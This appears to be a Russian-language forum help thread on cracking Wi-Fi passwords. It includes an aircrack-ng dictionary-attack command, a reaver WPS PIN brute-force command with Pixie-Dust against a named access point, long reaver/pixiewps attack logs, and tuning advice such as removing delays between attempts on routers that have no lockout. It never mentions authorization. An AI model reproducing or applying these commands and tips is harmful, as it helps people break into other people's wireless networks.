[Wi-Fi, BT] Задай вопрос - получи ответ!

Мне удалось установить backtrack, но он останавливаеться постоянно на определенном моменте когда идет подбор пароля и длиться это очень долго...
ваш я скачал и открыл в Wireshark, но как мне найти его у себя?

 

Как Вы запускаете подбор пароля?
Обычно в терминале для его запуска указывается путь к словарю, по которому будет идти перебор(или маска) и путь к файлу .сар
Как то так:
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
Стало быть сам .сар файл должен находиться в /tmp/wpa2*.cap, скопируйте его и сохраните на каком либо физическом диске.

 

Если pixiewps его не берёт - покажите лог reaver, с опциями -H -vv -K 1

 

Всем привет,запускаю reaver с параметрами -vv -K 1 после подбора первого пина 12345670 заканчивает свою работу, роутер не уходит в лок, роутер TPLINK TL-WR841N кто нибудь сталкивался ?

 

Непонятно, как именно reaver заканчивает свою работу. Где лог?

 

Вот так

Spoiler

root@datak1ng:~# reaver -i wlan0mon -b F8:1A:67:ED:23:3C -vv -K 1 -c 11

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 11
[+] Waiting for beacon from F8:1A:67:ED:23:3C
[+] Associated with F8:1A:67:ED:23:3C (ESSID: betman_wi-fi)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4d:8e:1b:76:90:be:9a:70:f8:15:95:7d:0c:bf:d0:63
[P] PKE: 4e:eb:62:ee:dc:8c:06:02:49:23:01:c4:3c:e9:f1:73:06:92:3c:11:80:a3:53:4b:e2:1b:6b:b3:52:23:c4:43:e9:53:1f:79:75:68:30:53:c9:2e:91:46:72:33:69:ca:01:2b:33:dc:49:b4:2a:4a:47:ab:ed:58:5f:2a:6d:df:d9:d8:04:c2:b9:b7:33:aa:7c:c3:60:c8:8f:e1:00:f1:cc:8c:f9:9f:ee:02:3f:b9:56:ed:b4:55:57:8a:13:fb:05:83:bd:b8:47:9f:75:9f:35:c5:5d:98:0f:d9:dc:ac:19:36:7a:68:39:81:cf:18:05:d7:2f:a0:dc:48:f4:e1:57:33:e3:9c:f5:38:fd:ce:da:a3:00:ff:6b:3a:31:31:83:83:5c:eb:d6:3a:61:63:3e:d3:90:d5:46:cf:88:82:93:b1:19:62:60:67:a5:ca:9a:38:19:c2:74:2a:ba:5f:9a:08:bd:f1:a4:5f:dc:5b:97:94:5a:85:16:2d:c3:d7
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR741ND
[P] WPS Model Number: 4.0
[P] Access Point Serial Number: 1.0
[+] Received M1 message
[P] R-Nonce: a7:1d:95:1a:24:ac:41:12:aa:71:fb:40:f4:0e:cc:8c
[P] PKR: 83:ef:ab:dd:8b:e1:a3:a7:ad:d9:44:ad:0b:79:1d:d9:29:25:45:82:22:78:d7:8e:2c:96:67:8f:ac:2e:75:ef:d1:c2:fb:3f:cf:fa:51:b1:4d:57:70:d2:8c:41:56:a5:f7:65:84:8b:6e:84:ec:bb:21:8d:38:18:fc:43:7c:ad:95:fe:b7:a7:5a:4d:47:bb:b8:5c:09:b8:27:d0:c1:54:22:5a:a8:5d:3a:ab:e9:58:ae:81:5a:74:e0:6e:a2:06:62:45:83:87:7a:0e:6a:74:0f:bf:b2:dd:f2:1c:c1:99:ef:32:2b:15:d5:9f:5f:5c:63:b8:fb:3b:25:88:92:c4:f1:60:9f:aa:82:ad:0d:a2:36:0b:67:db:8a:7f:8d:5d:3c:41:5d:b2:94:11:fe:f7:da:a3:25:98:28:c8:f6:5d:3e:11:d4:c5:5f:d7:8c:7a:e3:31:eb:ba:18:14:8f:64:c7:52:40:21:01:ff:99:bb:cb:44:a1:62:99:1e:a3:60
[P] AuthKey: 28:0f:69:de:5d:d5:bc:7e:e3:1d:04:11:3a:bf:54:d1:c1:1e:94:9d:e0:8b:e4:3b:16:5a:05:77:37:c1:84:75
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 81:de:ee:4f:c0:ef:db:bf:b3:d4:f9:39:ae:d0:b9:94
[P] PKE: 9f:05:6a:e0:56:7d:4b:b3:cd:3e:51:a7:51:1f:e4:17:9a:ac:a5:07:a6:0e:60:90:0f:d7:74:a1:6d:72:8c:90:b7:d1:a4:3b:14:97:47:ed:d4:51:6d:61:8f:c0:10:bd:fb:1f:7c:05:c5:4c:b4:89:d3:d3:dc:66:3b:bf:e9:b0:fb:2f:b3:6e:48:22:e1:d4:4e:0d:3a:bb:5f:f0:d2:94:19:25:5f:33:a0:88:69:c0:4e:37:75:23:0d:ee:dd:5e:b3:b4:cb:78:57:05:ba:56:2a:83:5b:df:45:00:e5:7c:3e:92:06:c8:db:9b:9c:c0:9e:1b:17:bd:11:34:8c:67:b4:3d:bb:10:4e:03:70:32:4a:8f:34:af:7e:ce:e7:53:f0:6b:05:67:87:55:97:18:c9:52:30:24:5a:e2:b4:ae:54:ba:72:6e:a0:ab:6f:f6:cf:1b:85:ee:c6:94:a2:7e:5b:d9:3d:83:11:02:6d:e5:da:d8:35:18:d0:4f:9c:a2
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR741ND
[P] WPS Model Number: 4.0
[P] Access Point Serial Number: 1.0
[+] Received M1 message
[P] R-Nonce: 90:d8:cb:a5:d2:6f:ee:b1:ae:2a:11:12:ca:99:37:1b
[P] PKR: 5a:9e:1e:e5:d7:e4:27:52:0f:75:09:2f:62:b1:6d:a8:13:79:4b:90:42:a6:75:e6:2f:7c:86:77:ae:f5:16:4c:84:b1:85:90:b6:66:3d:9b:6c:2a:94:73:44:ff:89:e7:a8:bf:4a:8f:7d:c3:31:09:10:4b:55:88:2e:59:d8:75:63:69:14:3e:8c:8b:09:4b:08:ec:fa:cc:52:a7:3f:e6:75:fd:bd:da:e3:a8:1c:1d:94:15:e2:bc:43:a2:71:c4:b3:e4:05:0d:72:bd:19:37:8e:80:ec:0a:a2:73:82:e1:e0:48:08:89:ce:6c:95:55:89:c5:d5:f7:fe:ca:26:87:aa:16:00:06:b2:9d:e9:3a:bf:f2:5d:94:72:06:32:73:75:2f:ee:d1:b7:04:70:de:0c:e7:cb:ce:b0:4c:24:ae:b9:9f:e7:16:4b:d0:24:ff:90:96:06:fc:14:64:62:60:0b:cd:a5:b3:05:84:26:65:80:07:4a:3d:17:f0:f3:4a
[P] AuthKey: b7:bc:0f:e3:d9:4d:bd:17:1f:da:15:69:38:12:b0:c8:c8:0f:fe:7c:66:56:06:50:8a:c7:20:b5:be:ea:49:8c
[+] Sending M2 message
[P] E-Hash1: 83:48:8f:3f:ae:c2:c3:cb:19:89:85:14:90:d6:29:eb:5c:d5:01:07:5b:b8:4b:2b:aa:67:85:73:85:c4:8a:c1
[P] E-Hash2: 54:fe:b0:11:94:6b:ce:fa:4e:61:ae:1e:ff:5a:55:e9:80:cb:34:c7:a4:d9:1b:a7:d5:3b:dd:2c:a0:2d:d4:7d
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 117 ms
[Pixie-Dust]

 

Ну, всё нормально, пин код не найден. А чтобы перебирало все пин коды, надо отключить режим Pixiewps, он у вас в аргументах прописан.

 

нашел, скопировал на рабочий стол ... а как оттудыва скопировать не могу понять
не видит флешку backtrack

 

какое то куцое окончание лога.
вот другое:

Spoiler: другое

[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 93 ms
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]

и бывает так, что после сообщения:
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
пин находится

 

Ну так это без режима полного перебора, а у вас он видно задействован.

 

c

странно, раньше после того как pixie заканчивал работу и не был найден пин, ривер продолжал перебирать все пины

 

Что-то не припомню такого. У меня всегда было именно так, как описал выше.

Возможно в предыдущих версиях форка было иначе, но не считаю такое поведение корректным с точки зрения концепций UNIX, ибо атака Pixiewps стоит строго отдельно от полного перебора.

Любая другая автоматизация реализуется скриптами.

 

Пример?

 

Это беда

 

да возможно я что-то путаю...а параметр

с удовольствием скинул бы лог,но это было на прошлой версии Kali уже обновил обе машины на более свежую. Друзья а с какими параметрами вы обычно запускаете reaver? например параметр -а (автоматическое определение метода взлома) вообще чтото делает ?разницы не видел

 

Уязвимости всегда были и всегда будут.

 

будут и только больше

 

Я тоже. Самые ходовые - -N, -A, -S
Это для ривера без пикси. Остальные ключи ни разу не принесли никакого эффеккта.

 

Да ладно, а как же "-d 0" для отключения задержки между попытками?

Для старых D-Link'ов, и некоторых других моделей без блокировки самое то!

 

Как вы покупаете не читая про адаптер?
А по сути,если бы прочитали внимательно,то знали бы что у N9000 Ралинк 3070,даже без вскрытия.А также-что он пригоден для вардрайвинга.